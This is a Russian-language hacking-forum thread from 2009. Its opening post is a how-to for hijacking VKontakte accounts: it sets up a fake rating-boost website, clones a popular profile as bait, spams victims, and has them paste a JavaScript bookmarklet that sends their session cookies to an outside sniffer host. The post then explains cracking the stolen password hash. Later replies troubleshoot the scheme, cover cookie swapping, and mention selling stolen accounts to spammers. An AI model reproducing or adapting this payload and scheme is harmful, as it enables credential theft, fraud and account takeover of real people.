Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Социальные сети (https://forum.antichat.xyz/forumdisplay.php?f=133)
-   -   угон акка от контакта на 90 % (https://forum.antichat.xyz/showthread.php?t=1976976)

TIGRA 25.08.2009 01:00

Пароль на архиве такой, что я с первого раза угадал:hmcool:

Axeee 25.08.2009 01:00

я так понял что при вставке этого кода, должна пойти анимация как бы повышающегося рейтинга да ? ..или просто появиться табличка ?

pantoderm 25.08.2009 01:00

Привет всем я Pantoderm и это моя первая статья так что не судите строго. Хотел бы поделиться с вами своим способом угона акков от популярной социальной сети Вконтакте.ру Для этого нам понадобиться (как и с фейком ) бесплатный хостинг , и парочка замечательных скриптов для поднятия рейтинга и повышения голосов( я их опубликую немного позже) . И так приступим =)
1)Сначало зарегистрируем себе сайт , сайт какой нибудь фирмы салидной , но о которой некто нечего не знает. Думаю с этим проблем не будет.
2) убираем с сайта всё кроме главное страницы , и делаем там рекламму . у меня за 10 минут получилось примерно такое http://reyting.wmsite.ru/ .
Лично я регал на http://www.webstolica.ru/ потому что вконтакте не выдаёт что эта ссылка ведёт на фришенговый сайт .

2.1) для хорошей рекламы нам понадобиться мажорик с большим рейтингом и ОТКРЫТОЙ СТРАНИЦЕЙ , что бы все могли заходить и смотреть что это правда. Для того что бы найти его мы заходим в группу где можно приглашать и нажимаем расширенный поиск ---- поиск и все у кого большой рейтинг идут первыми вот и выбирайте кого будем копировать

Что бы снять виде о подтверждении что скрипты работают мы зарегистрируем двойника этого мажорика . как это делать думаю объяснять не надо.
3)идём на раздачу халявных акков вконтакте берём и начинаем немного спамить
p/s что бы сорвать побольше акков нужно обязательно дописать « что бы рейтинг закрепился пригласите на сайт ещё 10 друзей» ну или сколько душе угодно =) только смотрите не переборщите
теперь объясняю суть идеи :
жертва заходит на сайт и видит что это бесплатный рейтинг , но её это настораживает специально для этого мы делаем отвод глаз и пишем что рейтинг не совсем бесплатный его получают за просмотр рекламы ,тогда жертва успакаеваться и спокойно вставляет скрипт , но скрипт с незаметной дороботкой а точнее с javascript:document.write('img = new Image(); img.src = "http://httpz.ru/nr7gif758k8.gif?"+document.cookie;') - это скрипт для адрессной строки со сниффера на .hacker-pro.net зарание замаскированным на тут потому что есть народ который знает про это и начинают портить всю малину . и когда наша жертва вставляет «волшебный» скрипт то о чудо на её странице рейтинг начинает подниматься ! в это время куки от контакта идут нам на сниффер в папку ЛОГ (для тех кто не знает ) . всё мы идём туда копирует remixpass а точнее то что стоит после знака равно = и расшифроввываем на онлайн расшифровщиках
теперь скрипты я их не стал выкладывать их сюда потому что народу много ходит я их залью а вы скачаете.
вот впринцепи и всё спасибо за внимание с вами был начинающий хакер Pantoderm так же хочу выразить благодарность Uxta .
смотрите внимательно куда вставлять JavaScript код для адресной строки
там всё написанно Скачать скрипты
специально для hacker-pro.net

пароль на архив со скриптами

Скрытый текст (вы должны быть авторизованы и иметь 10 сообщений):

У вас нет прав чтобы видеть скрытый текст, который находится здесь

всем удачи и если статека понравилась не скупитесь ставить плюс и спасибо

KpeBeDbI4 25.08.2009 01:00

Молорик, половину можно было заХАЙДить....ИМХО.

Цитата:

Сообщение от t0xA

Мне понравилось, можно еще запихать фейковые проги аля поднимаем рейтинг, фековый софт вобщем, в кукках есть трабла в том что MD5 трудно расшифровать... Или софт со склееным трояном!

да можно было бы желание . но я привёл пример сайта деловой фирмы которая дат рейтинг за просмотр рекламмы . и мне кажется что на проги мало кто ведёться а вот со скриптами можно ещё поработать ))

Цитата:

Сообщение от KpeBeDbI4

Молорик, половину можно было заХАЙДить....ИМХО.

я пытался но чёт не получаеться (

KpeBeDbI4 25.08.2009 01:00

Цитата:

Сообщение от pantoderm

я пытался но чёт не получаеться (

о_О" хайд походу убрали, я вообще найти не могу.

Цитата:

Сообщение от QwE43

а чтобы не парится с регистрацией новвого акка можно просто полоску рейтинга изменить :wink:

тоже верно но все знают про программу фотошоп . так что многие уйдут )) а видео доказывает что скрипт работает )

Uxta 25.08.2009 01:00

Молодец.
Только писал ты её конечно не совсем сам, вижу что чёто и от себя добавил, но суть с*****нул отсюда http://11rus-team.ru/forum/showthread.php?t=36
это даже видно по скринам которые делал я сам лично)

Цитата:

Сообщение от Uxta

Молодец.
Только писал ты её конечно не совсем сам, вижу что чёто и от себя добавил, но суть с*****нул отсюда http://11rus-team.ru/forum/showthread.php?t=36
это даже видно по скринам которые делал я сам лично)

блин извини чесное слово не знал об этом зуб даю )) а статью я сам писал с нуля отвечаю а скрины для сайта не буду врать взял у тебя ))

Uxta 25.08.2009 01:00

Цитата:

блин извини чесное слово не знал об этом зуб даю )) а статью я сам писал с нуля отвечаю

Ну да, и скрины загадочным образом у тебя такие же да? и с коментами теме же на них?))
Короче не гони. Пох*й, запостил и запостил.

Цитата:

Сообщение от Uxta

Ну да, и скрины загадочным образом у тебя такие же да? и с коментами теме же на них?))
Короче не гони.

да признаюсь картинку взяты у тебя , что бы не терять времени на сайте . так что извини меня за это. я честное слово не знал про твою статью . а за то что ты натолкнул меня на написание статьи я выразил тебе благодарность в конце

demooo 26.08.2009 01:00

пацы помогите мне сделать такую штуку к в первой статье я в этом полный 0
у меня всё есть код для рейтинга и снифера!!!!!!!!!!!!
ток я не пойму как это соеденить!!!!!!!!!
ПОМОГИТЕ ПЛЗ КОМУ НЕ ВПАДЛУ!!!!!!!!!!!!!!!!

pantoderm 26.08.2009 01:00

Цитата:

Сообщение от demooo

Добавлено через 4 минуты
ПЛЗ!!!!!!!!!!!!!

уже помог ))

JIEHHu-KEHHu 26.08.2009 01:00

Интересная статья Но вот только к чему угонять акк? профит за возврат? продать-то не получится. при смене имени - обнуляется рейтинг...

Hunone 26.08.2009 01:00

факт в том, что мне неприходят куки...когда убираю скрипт для командной строки (не имеет значении в каком виде, сам скрипт рабоает как нада, а так только сообщения вылазиют

pantoderm 28.08.2009 01:00

Цитата:

Сообщение от JIEHHu-KEHHu

Интересная статья Но вот только к чему угонять акк? профит за возврат? продать-то не получится. при смене имени - обнуляется рейтинг...

можно набрать акков и продать спамщикам )

kam1LLe 05.09.2009 01:00

У меня почему-то java скрипт не работает... После того, как я вставляю его к себе в строку, ничего не происходит...
Вот мои скрипты
Не шифрованный

Шифрованный

P.s Ни первый, не второй не работает... В чем может быть проблема?

pantoderm 05.09.2009 01:00

Скрытый текст (вы должны быть авторизованы и иметь 14 сообщений):

Все-равно не работает =((

pantoderm 05.09.2009 01:00

Скрытый текст (вы должны быть авторизованы и иметь 14 сообщений):

0x81 05.09.2009 01:00

kam1LLe, если ты имеешь в виду код для адресной строки то можешь просто скопировать этот код со страницы настроек в твоем аккаунте на онлайн сниффере.

Добавлено через 3 минуты
да и если ты вставляешь в адресную строку код тебе только в первый раз придут куки, эти же куки второй раз не придут пока не почистишь кэш. попробуй сменить ак чтоб куки изменились или с другого браузера, или почисть кэш

Vampir73rus 06.09.2009 01:00

ааа парни почему так ! я вставил яваскрипт в адресную строку и у меня пропали голоса ??? куда они делись ???

Добавлено через 4 минуты
убью того кто это сделал !!!

pantoderm 07.09.2009 01:00

Цитата:

Сообщение от Vampir73rus

ааа парни почему так ! я вставил яваскрипт в адресную строку и у меня пропали голоса ??? куда они делись ???

Добавлено через 4 минуты

чё ты сделал ???? распиши всё по пунктам

Гнат 08.09.2009 01:00

Цитата:

Сообщение от Vampir73rus

Добавлено через 4 минуты

Да ты вроде сам отдал свои куки народу, вот ктото зашел на с твоими куками и украл твои голоса. Не надо было вставлять этот скрипт

adrenalin_fun 10.09.2009 01:00

Стырил куки, а что дальше? Как из них сделать свои? Пробовал менять свои куки на чужие, контакт только думает-думает а потом всё равно выкидывает на мою страницу

pantoderm 11.09.2009 01:00

Цитата:

Сообщение от adrenalin_fun

Стырил куки, а что дальше? Как из них сделать свои? Пробовал менять свои куки на чужие, контакт только думает-думает а потом всё равно выкидывает на мою страницу

попробуй их расшифровать

Damir72 14.09.2009 01:00

MD 5 не расшифровать...
только подбор, и то если пароль легки можно провернуть, если нет то не получится ничего

done_f 14.09.2009 01:00

Цитата:

Сообщение от Damir72

MD 5 не расшифровать...
только подбор, и то если пароль легки можно провернуть, если нет то не получится ничего

как и обозначена тема, на 90% есть шанс взлома, мало кто из пользователей ставит пароли вида w3_j8-zm, так что все возможно, главное желание, а если его нет всегда можно сделать заказ ))

absentik 15.09.2009 01:00

Не совсем в тему, но что делать если жертва воспользовалась скриптом со снифера на адресную строку и там вышли след данные remixchk=5; remixsid=цыфрыдабуквыдохера и еще там пришел ip и еще воть
REFERER: http://vkontakte.ru/audio.php?gid=29620
AGENT: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRSPUTNIK 2, 1, 0, 4 HW; MRA 5.5 (build 02746); .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Я вот знаю что с Оперы мона зайти подменив кукисы в колонке с почтой и ремикс пассом. Я вот недогоняю одно: или с помощью ремиксid мона заходить и взломать контакт или снивер не словил нужного по скрипту у моей жертвы. Знающие люди помогите!!!!!!!

pantoderm 16.09.2009 01:00

Цитата:

Сообщение от Absentik

Не совсем в тему, но что делать если жертва воспользовалась скриптом со снифера на адресную строку и там вышли след данные remixchk=5; remixsid=цыфрыдабуквыдохера и еще там пришел ip и еще воть
REFERER: http://vkontakte.ru/audio.php?gid=29620
AGENT: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRSPUTNIK 2, 1, 0, 4 HW; MRA 5.5 (build 02746); .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Я вот знаю что с Оперы мона зайти подменив кукисы в колонке с почтой и ремикс пассом. Я вот недогоняю одно: или с помощью ремиксid мона заходить и взломать контакт или снивер не словил нужного по скрипту у моей жертвы. Знающие люди помогите!!!!!!!

что то не до конца пришло. ещё должно придти логи и пасс

GetGroovy 17.09.2009 01:00

Все прикрыли баг!!! пасворды хешиться на login.vk.com... и другие куки кроме remixsid и remixchk неприйдут!!

SAIRIS 17.09.2009 01:00

эм....я вот одного не понял, как "JavaScript код для адресной строки" соединить с JavaScript рейтинга? объясните.

docunent 19.09.2009 01:00

переделать скриптик надо)

anubis6666 19.09.2009 01:00

Цитата:

Сообщение от GetGroovy

Все прикрыли баг!!! пасворды хешиться на login.vk.com... и другие куки кроме remixsid и remixchk неприйдут!!

там уже не логины и пассы,а сессии т.к в самих куках даже пароля нет md5

kir55rus 20.09.2009 01:00

у меня вместо повышения рейтинга перебрасывало человека на другую страницу, че делать?
ЗЫ:перед этим рейтинг вообще не повышался((

GetGroovy 20.09.2009 01:00

Да скрипт уже не робит... надо другой уже писать

ТИША 21.09.2009 01:00

Каму нужны ааки в контакте пиши те в лс да м беспл

pak 05.10.2009 01:00

Шумахер Я это делал еше когда тема появилось все шло отлично но потом не стала приходит это тема я же не один такой тут! если появился другой случай юзай если делать нех токо акки воровать.

Шумахер 09.10.2009 01:00

Цитата:

Сообщение от pak

Шумахер Я это делал еше когда тема появилось все шло отлично но потом не стала приходит это тема я же не один такой тут! если появился другой случай юзай если делать нех токо акки воровать.

и сейчас все отлично идет,просто нынишний remixsid не проходит,так как там идет привязка к нему айпи адреса...А скрипты все работают...

Время: 23:26